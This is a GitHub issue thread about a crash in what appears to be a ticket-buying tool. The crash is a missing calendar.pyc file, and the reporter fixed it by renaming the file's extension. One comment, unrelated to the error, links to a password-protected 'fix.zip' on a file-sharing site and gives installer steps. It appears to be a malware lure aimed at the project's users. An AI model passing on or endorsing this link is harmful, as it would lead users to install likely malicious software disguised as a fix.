### ISSUE TITLE
[Bug]: 找不到文件导致闪退

### ISSUE THREAD

**Issue by wheatnobeer** [mikumifa/biliTickerBuy#418]
### 部署方式

手动部署

### 版本

v2.8.8

### 异常情况

手动将.\\_internal\\gradio_calendar\\calendar.pyc 的拓展名修改后解决

### 报错信息

FileNotFoundError:[Errno 2l No such file or directory  .\\_internal\\gradio_calendar\\calendar.pyc

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wheatnobeer** [comment]
更正一下部署方式是release
